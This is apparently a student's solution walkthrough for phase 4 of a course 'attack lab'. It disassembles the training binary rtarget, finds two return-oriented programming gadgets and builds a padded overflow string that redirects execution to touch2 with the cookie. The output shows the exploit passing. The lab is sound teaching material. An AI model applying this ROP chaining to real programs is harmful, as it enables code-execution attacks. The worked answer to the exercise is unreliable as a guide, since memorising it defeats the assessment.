objdump -d rtarget
0000000000401808 <touch2>:
401808: 48 83 ec 08 sub $0x8,%rsp
40180c: 89 fe mov %edi,%esi
40180e: c7 05 e4 2c 20 00 02 movl $0x2,0x202ce4(%rip) # 6044fc <vlevel>
401815: 00 00 00
401818: 3b 3d e6 2c 20 00 cmp 0x202ce6(%rip),%edi # 604504 <cookie>
40181e: 75 1b jne 40183b <touch2+0x33>
401820: bf 68 2f 40 00 mov $0x402f68,%edi
401825: b8 00 00 00 00 mov $0x0,%eax
40182a: e8 51 f4 ff ff callq 400c80 <printf@plt>
40182f: bf 02 00 00 00 mov $0x2,%edi
401834: e8 c0 03 00 00 callq 401bf9 <validate>
401839: eb 19 jmp 401854 <touch2+0x4c>
40183b: bf 90 2f 40 00 mov $0x402f90,%edi
401840: b8 00 00 00 00 mov $0x0,%eax
401845: e8 36 f4 ff ff callq 400c80 <printf@plt>
40184a: bf 02 00 00 00 mov $0x2,%edi
40184f: e8 57 04 00 00 callq 401cab <fail>
401854: bf 00 00 00 00 mov $0x0,%edi
401859: e8 92 f5 ff ff callq 400df0 <exit@plt>
00000000004017c6 <getbuf>:
4017c6: 48 83 ec 18 sub $0x18,%rsp <= 0x18 is 24 Bytes
4017ca: 48 89 e7 mov %rsp,%rdi
4017cd: e8 38 02 00 00 callq 401a0a <Gets>
4017d2: b8 01 00 00 00 mov $0x1,%eax
4017d7: 48 83 c4 18 add $0x18,%rsp
4017db: c3 retq
emacs phase4.s
mov %rax, %rdi
ret
gcc -c phase4.s
objdump -d phase4.o > phase4.d
emacs phase4.d
0000000000000000 <.text>:
0: 48 89 c7 mov %rax,%rdi
3: c3 retq
Save the file with CTRL+x then CTRL+c then y
Gadget 1
0000000000401970 <setval_352>:
401970: c7 07 e6 58 90 c3 movl $0xc39058e6,(%rdi)
401976: c3 retq
Address + bytes to get 58 in front = gadget1 401970 + 3 = 401973
Gadget 2
0000000000401984 <getval_322>:
401984: b8 48 89 c7 c3 mov $0xc3c78948,%eax
401989: c3 retq
Address + bytes to get 48 89 c7 in front = gadget2 401984 + 1 = 401985
cookie = 48 c7 c7 9f 5f 19 19 c3
emacs phase4.txt
00 00 00 00 00 00 00 00 /* padding */
00 00 00 00 00 00 00 00 /* padding */
00 00 00 00 00 00 00 00 /* padding */
73 19 40 00 00 00 00 00 /* gadget 1 */
9f 5f 19 19 c3 00 00 00 /* Cookie with first 3 bytes removed */
85 19 40 00 00 00 00 00 /* gadget 2 */
08 18 40 00 00 00 00 00 /* touch2 address */
Save the file with CTRL+x then CTRL+c then y
./hex2raw < phase4.txt > raw-phase4.txt
Just to see what hex2raw does to the bytes in phase4.txt we run
emacs raw-phase4.txt
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@s^Y@^@^@^@^@^@\237_^Y^Y\
\303^@^@^@\205^Y@^@^@^@^@^@^H^X@^@^@^@^@^@
Save the file with CTRL+x then CTRL+c then y
./rtarget < raw-phase4.txt
Cookie: 0x19195f9f
Type string:Touch2!: You called touch2(0x19195f9f)
Valid solution for level 2 with target rtarget
PASS: Sent exploit string to server to be validated.
NICE JOB!